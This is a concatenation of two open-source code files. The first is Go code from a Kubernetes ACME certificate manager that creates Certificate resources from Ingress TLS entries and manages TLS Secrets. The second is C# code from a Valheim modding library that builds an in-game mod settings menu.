// The enabled annotation is deprecated when a class label is used
if p.class == "" && ingress.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
return nil
}
var certs []Certificate
provider := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "provider")], p.defaultProvider)
email := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "email")], p.defaultEmail)
if provider == "" || email == "" {
return nil
}
for _, tls := range ingress.Spec.TLS {
if len(tls.Hosts) < 1 {
continue
}
cert := Certificate{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Certificate",
},
Metadata: api.ObjectMeta{
Namespace: ingress.Namespace,
},
Spec: CertificateSpec{
Domain: tls.Hosts[0],
Provider: provider,
Email: email,
SecretName: tls.SecretName,
AltNames: tls.Hosts[1:],
},
}
certs = append(certs, cert)
}
return certs
}
func (p *CertProcessor) processIngress(ingress v1beta1.Ingress) {
if p.class == "" && ingress.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
return
}
source := v1.EventSource{
Component: "kube-cert-manager",
}
var certs []Certificate
provider := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "provider")], p.defaultProvider)
email := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "email")], p.defaultEmail)
for _, tls := range ingress.Spec.TLS {
if len(tls.Hosts) == 0 {
continue
}
altNames := tls.Hosts[1:]
cert := Certificate{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Certificate",
},
Metadata: api.ObjectMeta{
Namespace: ingress.Namespace,
},
Spec: CertificateSpec{
Domain: tls.Hosts[0],
Provider: provider,
Email: email,
SecretName: tls.SecretName,
AltNames: altNames,
},
}
certs = append(certs, cert)
}
if len(certs) > 0 && (provider == "" || email == "") {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEMissingAnnotation",
Message: "Couldn't create certificates: missing email or provider annotation",
Source: source,
Type: "Warning",
})
return
}
for _, cert := range certs {
processed, err := p.processCertificate(cert)
if err != nil {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEError",
Message: fmt.Sprintf("Couldn't create certificate for secret %s: %s", cert.Spec.SecretName, err),
Source: source,
Type: "Warning",
})
continue
}
if processed {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEProcessed",
Message: fmt.Sprintf("Processed ACME certificate for secret: %s", cert.Spec.SecretName),
Source: source,
Type: "Normal",
})
}
}
}
func certificateNamespace(c Certificate) string {
if c.Metadata.Namespace != "" {
return c.Metadata.Namespace
}
return "default"
}
func (p *CertProcessor) getLabelSelector() labels.Selector {
if p.class != "" {
r, err := labels.NewRequirement(
addTagPrefix(p.tagPrefix, "class"),
selection.Equals,
[]string{p.class},
)
if err != nil {
log.Fatalf("unable to create class-equals requirement: %v", err)
}
return labels.NewSelector().Add(*r)
}
return nil
}
func addTagPrefix(prefix, tag string) string {
if prefix == "" {
return tag
} else if strings.HasSuffix(prefix, ".") {
// Support the deprecated "stable.k8s.psg.io/kcm." prefix
return prefix + tag
}
return prefix + "/" + tag
}
func valueOrDefault(a, b string) string {
if a != "" {
return a
}
return b
}
<|start_filename|>k8s.go<|end_filename|>
// Copyright 2016 Google Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"crypto"
"crypto/x509"
"encoding/json"
"encoding/pem"
"fmt"
"log"
"net/http"
"net/url"
"github.com/pkg/errors"
"github.com/xenolf/lego/acme"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/pkg/api"
kerrors "k8s.io/client-go/pkg/api/errors"
"k8s.io/client-go/pkg/api/meta"
"k8s.io/client-go/pkg/api/unversioned"
"k8s.io/client-go/pkg/api/v1"
"k8s.io/client-go/pkg/apis/extensions/v1beta1"
"k8s.io/client-go/pkg/labels"
"k8s.io/client-go/pkg/runtime"
"k8s.io/client-go/pkg/util/flowcontrol"
"k8s.io/client-go/pkg/watch"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/cache"
)
// K8sClient provides convenience functions for handling resources this project
// cares about
// TODO: merge the two clients
type K8sClient struct {
c *kubernetes.Clientset
certClient *rest.RESTClient
}
type WatchEvent struct {
Type string `json:"type"`
Object json.RawMessage `json:"object"`
}
type CertificateEvent struct {
Type string `json:"type"`
Object Certificate `json:"object"`
}
type Certificate struct {
unversioned.TypeMeta `json:",inline"`
Metadata api.ObjectMeta `json:"metadata"`
Spec CertificateSpec `json:"spec"`
}
func (c *Certificate) GetObjectKind() unversioned.ObjectKind {
return &c.TypeMeta
}
func (c *Certificate) GetObjectMeta() meta.Object {
return &c.Metadata
}
type CertificateCopy Certificate
// Temporary workaround for https://github.com/kubernetes/client-go/issues/8
func (c *Certificate) UnmarshalJSON(data []byte) error {
tmp := CertificateCopy{}
err := json.Unmarshal(data, &tmp)
if err != nil {
return err
}
tmp2 := Certificate(tmp)
*c = tmp2
return nil
}
type CertificateList struct {
unversioned.TypeMeta `json:",inline"`
Metadata unversioned.ListMeta `json:"metadata"`
Items []Certificate `json:"items"`
}
func (c *CertificateList) GetObjectKind() unversioned.ObjectKind {
return &c.TypeMeta
}
func (c *CertificateList) GetListMeta() unversioned.List {
return &c.Metadata
}
type CertificateListCopy CertificateList
// Temporary workaround for https://github.com/kubernetes/client-go/issues/8
func (cl *CertificateList) UnmarshalJSON(data []byte) error {
tmp := CertificateListCopy{}
err := json.Unmarshal(data, &tmp)
if err != nil {
return err
}
tmp2 := CertificateList(tmp)
*cl = tmp2
return nil
}
type CertificateSpec struct {
Domain string `json:"domain"`
Provider string `json:"provider"`
Email string `json:"email"`
SecretName string `json:"secretName"`
AltNames []string `json:"altNames"`
}
type ACMECertData struct {
DomainName string
Cert []byte
PrivateKey []byte
}
type IngressEvent struct {
Type string `json:"type"`
Object v1beta1.Ingress `json:"object"`
}
func ingressReference(ing v1beta1.Ingress, path string) v1.ObjectReference {
return v1.ObjectReference{
Kind: "Ingress",
Namespace: ing.Namespace,
Name: ing.Name,
UID: ing.UID,
ResourceVersion: ing.ResourceVersion,
FieldPath: path,
}
}
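// createEvent fills in defaulted Event fields (name, kind, API version,
// timestamps, count) and posts the event to the Kubernetes API, logging any
// failure instead of returning it.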
func (k K8sClient) createEvent(ev v1.Event) {
now := unversioned.Now()
ev.Name = fmt.Sprintf("%s.%x", ev.InvolvedObject.Name, now.UnixNano())
if ev.Kind == "" {
ev.Kind = "Event"
}
if ev.APIVersion == "" {
ev.APIVersion = "v1"
}
if ev.FirstTimestamp.IsZero() {
ev.FirstTimestamp = now
}
if ev.LastTimestamp.IsZero() {
ev.LastTimestamp = now
}
if ev.Count == 0 {
ev.Count = 1
}
_, err := k.c.Core().Events(ev.Namespace).Create(&ev)
if err != nil {
log.Printf("Error posting event: %v\n", err)
return
}
}
type ACMEUserData struct {
Email string `json:"email"`
Registration *acme.RegistrationResource `json:"registration"`
Key []byte `json:"key"`
}
type ACMECertDetails struct {
Domain string `json:"domain"`
CertURL string `json:"certUrl"`
CertStableURL string `json:"certStableUrl"`
AccountRef string `json:"accountRef,omitempty"`
}
func (u *ACMEUserData) GetEmail() string {
return u.Email
}
func (u *ACMEUserData) GetRegistration() *acme.RegistrationResource {
return u.Registration
}
func (u *ACMEUserData) GetPrivateKey() crypto.PrivateKey {
pemBlock, _ := pem.Decode(u.Key)
if pemBlock.Type != "RSA PRIVATE KEY" {
log.Printf("Invalid PEM user key: Expected RSA PRIVATE KEY, got %v", pemBlock.Type)
}
privateKey, err := x509.ParsePKCS1PrivateKey(pemBlock.Bytes)
if err != nil {
log.Printf("Error while parsing private key: %v", err)
}
return privateKey
}
// ToSecret creates a Kubernetes Secret from an ACME Certificate
func (c *ACMECertData) ToSecret(tagPrefix, class string) *v1.Secret {
var metadata v1.ObjectMeta
// The "true" annotation is deprecated when a class label is used
if class != "" {
metadata.Labels = map[string]string{
addTagPrefix(tagPrefix, "domain"): c.DomainName,
addTagPrefix(tagPrefix, "class"): class,
}
} else {
metadata.Labels = map[string]string{
addTagPrefix(tagPrefix, "domain"): c.DomainName,
}
metadata.Annotations = map[string]string{
addTagPrefix(tagPrefix, "enabled"): "true",
}
}
data := make(map[string][]byte)
data["tls.crt"] = c.Cert
data["tls.key"] = c.PrivateKey
data["tls.pem"] = append(c.PrivateKey, c.Cert...)
return &v1.Secret{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Secret",
},
Data: data,
ObjectMeta: metadata,
Type: "kubernetes.io/tls",
}
}
func NewACMECertDataFromSecret(s *v1.Secret, tagPrefix string) (ACMECertData, error) {
var acmeCertData ACMECertData
var ok bool
acmeCertData.DomainName = getDomainFromLabel(s, tagPrefix)
acmeCertData.Cert, ok = s.Data["tls.crt"]
if !ok {
return acmeCertData, errors.Errorf("Could not find key tls.crt in secret %v", s.Name)
}
acmeCertData.PrivateKey, ok = s.Data["tls.key"]
if !ok {
return acmeCertData, errors.Errorf("Could not find key tls.key in secret %v", s.Name)
}
return acmeCertData, nil
}
func NewACMECertDetailsFromResource(certRes acme.CertificateResource) ACMECertDetails {
return ACMECertDetails{
Domain: certRes.Domain,
CertURL: certRes.CertURL,
CertStableURL: certRes.CertStableURL,
AccountRef: certRes.AccountRef,
}
}
func (certDetails *ACMECertDetails) ToCertResource() acme.CertificateResource {
return acme.CertificateResource{
Domain: certDetails.Domain,
CertURL: certDetails.CertURL,
CertStableURL: certDetails.CertStableURL,
AccountRef: certDetails.AccountRef,
}
}
func (k K8sClient) getSecret(namespace string, key string) (*v1.Secret, error) {
secret, err := k.c.Core().Secrets(namespace).Get(key)
if err != nil {
switch kerr := err.(type) {
case kerrors.APIStatus:
if kerr.Status().Code == http.StatusNotFound {
return nil, nil
} else {
return nil, errors.Wrapf(err, "Unexpected status code whle fetching secret %q: %v", key, kerr.Status())
}
}
return nil, errors.Wrapf(err, "Unexpected error while fetching secret %q", key)
}
return secret, nil
}
func (k K8sClient) saveSecret(namespace string, secret *v1.Secret, isUpdate bool) error {
if secret.Name == "" {
return errors.New("Secret name must be specified in metadata")
}
if isUpdate {
_, err := k.c.Secrets(namespace).Update(secret)
return err
} else {
_, err := k.c.Secrets(namespace).Create(secret)
return err
}
}
func (k K8sClient) deleteSecret(namespace string, key string) error {
return k.c.Secrets(namespace).Delete(key, nil)
}
func (k K8sClient) getSecrets(namespace string, labelSelector labels.Selector) ([]v1.Secret, error) {
listOpts := v1.ListOptions{}
if labelSelector != nil {
listOpts.LabelSelector = labelSelector.String()
}
list, err := k.c.Secrets(namespace).List(listOpts)
if err != nil {
return nil, err
}
return list.Items, nil
}
func (k K8sClient) getCertificates(namespace string, labelSelector labels.Selector) ([]Certificate, error) {
rl := flowcontrol.NewTokenBucketRateLimiter(0.2, 3)
for {
rl.Accept()
req := k.certClient.Get().Resource("certificates").Namespace(namespace)
if labelSelector != nil {
req = req.LabelsSelectorParam(labelSelector)
}
var certList CertificateList
err := req.Do().Into(&certList)
if err != nil {
log.Printf("Error while retrieving certificate: %v. Retrying", err)
} else {
return certList.Items, nil
}
}
}
func (k K8sClient) getIngresses(namespace string, labelSelector labels.Selector) ([]v1beta1.Ingress, error) {
rl := flowcontrol.NewTokenBucketRateLimiter(0.2, 3)
for {
rl.Accept()
listOpts := v1.ListOptions{}
if labelSelector != nil {
listOpts.LabelSelector = labelSelector.String()
}
ingresses, err := k.c.Extensions().Ingresses(namespace).List(listOpts)
if err != nil {
log.Printf("Error while retrieving ingress: %v. Retrying", err)
} else {
return ingresses.Items, nil
}
}
}
// Copied from cache.NewListWatchFromClient since that constructor doesn't
// allow labelselectors, but labelselectors should be preferred over field
// selectors.
func newListWatchFromClient(c cache.Getter, resource string, namespace string, selector labels.Selector) *cache.ListWatch {
listFunc := func(options api.ListOptions) (runtime.Object, error) {
return c.Get().
Namespace(namespace).
Resource(resource).
VersionedParams(&options, api.ParameterCodec).
LabelsSelectorParam(selector).
Do().
Get()
}
watchFunc := func(options api.ListOptions) (watch.Interface, error) {
return c.Get().
Prefix("watch").
Namespace(namespace).
Resource(resource).
VersionedParams(&options, api.ParameterCodec).
LabelsSelectorParam(selector).
Watch()
}
return &cache.ListWatch{ListFunc: listFunc, WatchFunc: watchFunc}
}
func (k K8sClient) monitorCertificateEvents(namespace string, selector labels.Selector, done <-chan struct{}) <-chan CertificateEvent {
events := make(chan CertificateEvent)
evFunc := func(evType watch.EventType, obj interface{}) {
cert, ok := obj.(*Certificate)
if !ok {
log.Printf("could not convert %v (%T) into Certificate", obj, obj)
return
}
events <- CertificateEvent{
Type: string(evType),
Object: *cert,
}
}
source := newListWatchFromClient(k.certClient, "certificates", namespace, selector)
store, ctrl := cache.NewInformer(source, &Certificate{}, 0, cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
evFunc(watch.Added, obj)
},
UpdateFunc: func(old, new interface{}) {
evFunc(watch.Modified, new)
},
DeleteFunc: func(obj interface{}) {
evFunc(watch.Deleted, obj)
},
})
go func() {
for _, initObj := range store.List() {
evFunc(watch.Added, initObj)
}
go ctrl.Run(done)
}()
return events
}
func (k K8sClient) monitorIngressEvents(namespace string, selector labels.Selector, done <-chan struct{}) <-chan IngressEvent {
events := make(chan IngressEvent)
evFunc := func(evType watch.EventType, obj interface{}) {
ing, ok := obj.(*v1beta1.Ingress)
if !ok {
log.Printf("could not convert %v (%T) into Ingress", obj, obj)
return
}
events <- IngressEvent{
Type: string(evType),
Object: *ing,
}
}
source := newListWatchFromClient(k.c.Extensions().RESTClient(), "ingresses", namespace, selector)
store, ctrl := cache.NewInformer(source, &v1beta1.Ingress{}, 0, cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
evFunc(watch.Added, obj)
},
UpdateFunc: func(old, new interface{}) {
evFunc(watch.Modified, new)
},
DeleteFunc: func(obj interface{}) {
evFunc(watch.Deleted, obj)
},
})
go func() {
for _, initObj := range store.List() {
evFunc(watch.Added, initObj)
}
go ctrl.Run(done)
}()
return events
}
func namespacedEndpoint(endpoint, namespace string) string {
return fmt.Sprintf(endpoint, namespace)
}
func namespacedAllCertEndpoint(endpoint, certNamespace string) string {
return fmt.Sprintf(endpoint, certNamespace)
}
func namespacedCertEndpoint(endpoint, certNamespace, namespace string) string {
return fmt.Sprintf(endpoint, certNamespace, namespace)
}
func addURLArgument(urlString string, key string, value string) (string, error) {
u, err := url.Parse(urlString)
if err != nil {
return "", errors.Wrapf(err, "Error parsing URL: %v", err)
}
q := u.Query()
q.Set(key, value)
u.RawQuery = q.Encode()
return u.String(), nil
}
func getDomainFromLabel(s *v1.Secret, tagPrefix string) string {
domain := s.Labels[addTagPrefix(tagPrefix, "domain")]
if domain == "" {
// deprecated plain "domain" label
// check for it in case people have the plain label in secrets when upgrading
// will be updated to the prefixed label when the Secret is next updated
domain = s.Labels["domain"]
}
return domain
}
| jbclabs/kube-cert-manager |
<|start_filename|>JotunnLib/GUI/InGameConfig.cs<|end_filename|>
// JotunnLib
// a Valheim mod
//
// File: InGameConfig.cs
// Project: JotunnLib
using System;
using System.Collections;
using System.Collections.Generic;
using System.Globalization;
using System.Linq;
using BepInEx;
using BepInEx.Configuration;
using Jotunn.Managers;
using Jotunn.Utils;
using UnityEngine;
using UnityEngine.Events;
using UnityEngine.UI;
using Object = UnityEngine.Object;
namespace Jotunn.GUI
{
/// <summary>
/// An ingame GUI for BepInEx config files
/// </summary>
internal static class InGameConfig
{
/// <summary>
/// Name of the menu entry
/// </summary>
private const string MenuToken = <PASSWORD>";
/// <summary>
/// Text of the Cancel button
/// </summary>
private const string CancelToken = <PASSWORD>";
/// <summary>
/// Text of the OK button
/// </summary>
private const string OKToken = "<PASSWORD>";
/// <summary>
/// Text of the keybind dialogue
/// </summary>
private const string KeybindToken = "<PASSWORD>";
/// <summary>
/// Mod settings Prefab
/// </summary>
private static GameObject SettingsPrefab;
/// <summary>
/// Current mod settings instance
/// </summary>
private static GameObject SettingsRoot;
/// <summary>
/// Load and init hooks on client instances
/// </summary>
[PatchInit(0)]
public static void Init()
{
// Don't init on a headless server
if (GUIManager.IsHeadless())
{
return;
}
LoadDefaultLocalization();
GUIManager.OnCustomGUIAvailable += LoadModSettingsPrefab;
On.FejdStartup.SetupGui += FejdStartup_SetupGui;
On.Menu.Start += Menu_Start;
}
/// <summary>
/// Register Jötunn's default localization
/// </summary>
private static void LoadDefaultLocalization()
{
LocalizationManager.Instance.JotunnLocalization.AddTranslation(MenuToken, "Mod Settings");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(CancelToken, "Cancel");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(OKToken, "OK");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(KeybindToken, "Press a key");
}
/// <summary>
/// Load the mod settings prefab and apply Valheim style to it
/// </summary>
private static void LoadModSettingsPrefab()
{
AssetBundle bundle = AssetUtils.LoadAssetBundleFromResources("modsettings", typeof(Main).Assembly);
SettingsPrefab = bundle.LoadAsset<GameObject>("ModSettings");
PrefabManager.Instance.AddPrefab(SettingsPrefab, Main.Instance.Info.Metadata);
bundle.Unload(false);
SettingsPrefab.AddComponent<CloseBehaviour>();
var settings = SettingsPrefab.GetComponent<ModSettings>();
settings.Panel.sprite = GUIManager.Instance.GetSprite("woodpanel_settings");
settings.Panel.type = Image.Type.Sliced;
settings.Panel.material = PrefabManager.Cache.GetPrefab<Material>("litpanel");
GUIManager.Instance.ApplyTextStyle(settings.Header, GUIManager.Instance.AveriaSerifBold, GUIManager.Instance.ValheimOrange, 32);
settings.Header.text = LocalizationManager.Instance.TryTranslate(MenuToken);
GUIManager.Instance.ApplyButtonStyle(settings.CurrentPluginButton);
var currentPluginButtonImage = settings.CurrentPluginButton.GetComponent<Image>();
currentPluginButtonImage.sprite = GUIManager.Instance.GetSprite("crafting_panel_bkg");
currentPluginButtonImage.type = Image.Type.Sliced;
currentPluginButtonImage.material = new Material(PrefabManager.Cache.GetPrefab<Material>("litpanel"));
currentPluginButtonImage.material.SetFloat("_Brightness", 1f);
settings.CurrentPluginButton.GetComponentInChildren<Text>(true).fontSize = 20;
GUIManager.Instance.ApplyScrollRectStyle(settings.ScrollRect);
settings.ScrollRect.GetComponent<Image>().sprite = GUIManager.Instance.GetSprite("panel_interior_bkg_128");
GUIManager.Instance.ApplyButtonStyle(settings.CancelButton, 20);
settings.CancelButton.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(CancelToken);
GUIManager.Instance.ApplyButtonStyle(settings.OKButton, 20);
settings.OKButton.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(OKToken);
var keybindPanel = settings.BindDialog.GetComponentInChildren<Image>(true);
keybindPanel.sprite = GUIManager.Instance.GetSprite("woodpanel_password");
keybindPanel.type = Image.Type.Sliced;
keybindPanel.material = PrefabManager.Cache.GetPrefab<Material>("litpanel");
var keybindText = settings.BindDialog.GetComponentInChildren<Text>(true);
GUIManager.Instance.ApplyTextStyle(keybindText, GUIManager.Instance.AveriaSerifBold, GUIManager.Instance.ValheimOrange, 20);
keybindText.text = LocalizationManager.Instance.TryTranslate(KeybindToken);
var plugin = settings.PluginPrefab.GetComponent<ModSettingPlugin>();
GUIManager.Instance.ApplyButtonStyle(plugin.Button);
var pluginButtonImage = plugin.Button.GetComponent<Image>();
pluginButtonImage.sprite = GUIManager.Instance.GetSprite("crafting_panel_bkg");
pluginButtonImage.type = Image.Type.Sliced;
pluginButtonImage.material = new Material(PrefabManager.Cache.GetPrefab<Material>("litpanel"));
pluginButtonImage.material.SetFloat("_Brightness", 1f);
plugin.Text.fontSize = 20;
var section = settings.SectionPrefab.GetComponent<Text>();
section.font = GUIManager.Instance.AveriaSerifBold;
var config = settings.ConfigPrefab.GetComponent<ModSettingConfig>();
config.Header.font = GUIManager.Instance.AveriaSerifBold;
config.Description.font = GUIManager.Instance.AveriaSerifBold;
GUIManager.Instance.ApplyButtonStyle(config.Button, 14);
config.Button.GetComponent<Image>().sprite = GUIManager.Instance.GetSprite("text_field");
config.Button.GetComponentInChildren<Text>(true).color = Color.white;
GUIManager.Instance.ApplyInputFieldStyle(config.InputField, 14);
GUIManager.Instance.ApplyToogleStyle(config.Toggle);
GUIManager.Instance.ApplyDropdownStyle(config.Dropdown, 14);
config.Dropdown.ClearOptions();
GUIManager.Instance.ApplySliderStyle(config.Slider, new Vector2(15f, -10f));
GUIManager.Instance.ApplyInputFieldStyle(config.ColorInput, 14);
GUIManager.Instance.ApplyButtonStyle(config.ColorButton);
var vector2 = config.Vector2InputX.transform.parent.gameObject;
foreach (var txt in vector2.GetComponentsInChildren<Text>(true))
{
GUIManager.Instance.ApplyTextStyle(txt, 14);
}
foreach (var inp in vector2.GetComponentsInChildren<InputField>(true))
{
GUIManager.Instance.ApplyInputFieldStyle(inp, 14);
}
GUIManager.OnCustomGUIAvailable -= LoadModSettingsPrefab;
}
/// <summary>
/// Adding a MonoBehaviour to close the mod settings here.
/// The Unity project does not know about BepInEx...
/// </summary>
private class CloseBehaviour : MonoBehaviour
{
private void Awake()
{
var settings = GetComponent<ModSettings>();
settings.CancelButton.onClick.AddListener(() =>
{
try { ColorPicker.Cancel(); } catch (Exception) { }
ZInput.instance.Load();
HideWindow();
});
settings.OKButton.onClick.AddListener(() =>
{
try { ColorPicker.Done(); } catch (Exception) { }
ZInput.instance.Save();
SaveConfiguration();
HideWindow();
});
}
private void Update()
{
if (Input.GetKeyDown(KeyCode.Escape))
{
GetComponent<ModSettings>().CancelButton.onClick.Invoke();
}
}
}
/// <summary>
/// Add default localization and instantiate the mod settings button in Fejd.
/// </summary>
private static void FejdStartup_SetupGui(On.FejdStartup.orig_SetupGui orig, FejdStartup self)
{
orig(self);
try
{
var menuList = self.m_mainMenu.transform.Find("MenuList");
CreateMenu(menuList);
self.StartCoroutine(CreateWindow(menuList));
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while creating the Mod Settings: {ex}");
}
}
/// <summary>
/// Cache current configuration values for possible sync and instantiate
/// the mod settings button on first in-game menu start.
/// </summary>
private static void Menu_Start(On.Menu.orig_Start orig, Menu self)
{
orig(self);
try
{
SynchronizationManager.Instance.CacheConfigurationValues();
CreateMenu(self.m_menuDialog);
self.StartCoroutine(CreateWindow(self.m_menuDialog));
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while creating the Mod Settings: {ex}");
}
}
/// <summary>
/// Create our own menu list entry when mod config is available
/// </summary>
/// <param name="menuList"></param>
private static void CreateMenu(Transform menuList)
{
var anyConfig = BepInExUtils.GetDependentPlugins(true).Any(x => GetConfigurationEntries(x.Value).Any());
if (!anyConfig)
{
return;
}
Logger.LogDebug("Instantiating Mod Settings");
var settingsFound = false;
var mainMenuButtons = new List<Button>();
for (int i = 0; i < menuList.childCount; i++)
{
if (menuList.GetChild(i).gameObject.activeInHierarchy &&
menuList.GetChild(i).name != "ModSettings" &&
menuList.GetChild(i).TryGetComponent<Button>(out var menuButton))
{
mainMenuButtons.Add(menuButton);
}
if (menuList.GetChild(i).name == "Settings")
{
Transform modSettings = Object.Instantiate(menuList.GetChild(i), menuList);
modSettings.name = "ModSettings";
modSettings.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(MenuToken);
Button modSettingsButton = modSettings.GetComponent<Button>();
for (int j = 0; j < modSettingsButton.onClick.GetPersistentEventCount(); ++j)
{
modSettingsButton.onClick.SetPersistentListenerState(j, UnityEventCallState.Off);
}
modSettingsButton.onClick.RemoveAllListeners();
modSettingsButton.onClick.AddListener(() =>
{
try
{
ShowWindow();
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while showing the Mod Settings window: {ex}");
}
});
mainMenuButtons.Add(modSettingsButton);
Transform left = modSettings.Find("LeftKnot");
if (left != null)
{
left.localPosition = new Vector2(left.localPosition.x - 10f, left.localPosition.y);
}
Transform right = modSettings.Find("RightKnot");
if (right != null)
{
right.localPosition = new Vector2(right.localPosition.x + 10f, right.localPosition.y);
}
settingsFound = true;
}
else if (settingsFound)
{
RectTransform rectTransform = menuList.GetChild(i).GetComponent<RectTransform>();
rectTransform.anchoredPosition = new Vector2(rectTransform.anchoredPosition.x,
rectTransform.anchoredPosition.y - 40);
}
}
if (FejdStartup.instance != null)
{
FejdStartup.instance.m_menuButtons = mainMenuButtons.ToArray();
}
}
/// <summary>
/// Create custom configuration window
/// </summary>
private static IEnumerator CreateWindow(Transform menuList)
{
// Create settings window
SettingsRoot = Object.Instantiate(SettingsPrefab, menuList.parent);
SettingsRoot.SetActive(false);
var settings = SettingsRoot.GetComponent<ModSettings>();
// Iterate over all dependent plugins (including Jotunn itself)
foreach (var mod in BepInExUtils.GetDependentPlugins(true)
.OrderBy(x => x.Value.Info.Metadata.Name))
{
if (!GetConfigurationEntries(mod.Value).Any(x => x.Value.IsVisible()))
{
continue;
}
try
{
CreatePlugin(settings, mod);
}
catch (Exception ex)
{
Logger.LogWarning($"Exception caught while creating mod settings for {mod.Key}: {ex}");
}
yield return null;
}
}
/// <summary>
/// Create settings for a plugin
/// </summary>
private static void CreatePlugin(ModSettings settings, KeyValuePair<string, BaseUnityPlugin> mod)
{
settings.AddPlugin(mod.Key, $"{mod.Value.Info.Metadata.Name} {mod.Value.Info.Metadata.Version}");
foreach (var kv in GetConfigurationEntries(mod.Value)
.Where(x => x.Value.IsVisible())
.GroupBy(x => x.Key.Section))
{
settings.AddSection(mod.Key, kv.Key);
foreach (var entry in kv.OrderBy(x =>
{
if (x.Value.Description.Tags.FirstOrDefault(y => y is ConfigurationManagerAttributes) is
ConfigurationManagerAttributes cma)
{
return cma.Order ?? int.MaxValue;
}
return int.MaxValue;
}).ThenBy(x => x.Key.Key))
{
// Skip actual GamepadConfigs, those are combined with ButtonConfig entries
if (entry.Value.SettingType == typeof(InputManager.GamepadButton))
{
continue;
}
// Get Attributes or instantiate default
var entryAttributes =
entry.Value.Description.Tags.FirstOrDefault(x => x is ConfigurationManagerAttributes) as
ConfigurationManagerAttributes ?? new ConfigurationManagerAttributes();
// Build description
var description = entry.Value.Description.Description;
var buttonName = entry.Value.GetBoundButtonName();
if (!string.IsNullOrEmpty(buttonName))
{
description += $"{Environment.NewLine}This key is bound to button '{buttonName.Split('!')[0]}'.";
}
if (entry.Value.Description.AcceptableValues != null)
{
description += Environment.NewLine + "(" +
entry.Value.Description.AcceptableValues.ToDescriptionString()
.TrimStart('#')
.Trim() + ")";
}
if (entryAttributes.IsAdminOnly)
{
description += $"{Environment.NewLine}(Server side setting)";
}
// Add new Config GO and add config bound component by type
if (entry.Value.SettingType == typeof(bool))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundBoolean>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(int))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundInt>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(float))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundFloat>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(double))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundDouble>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(string))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundString>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(KeyCode))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundKeyCode>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
if (entry.Value.GetButtonConfig()?.GamepadConfig != null)
{
var conf2 = go.AddComponent<ConfigBoundGamepadButton>();
conf2.SetData(mod.Value.Info.Metadata.GUID,
entry.Value.GetButtonConfig().GamepadConfig);
}
}
else if (entry.Value.SettingType == typeof(KeyboardShortcut))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundKeyboardShortcut>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(Color))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundColor>();
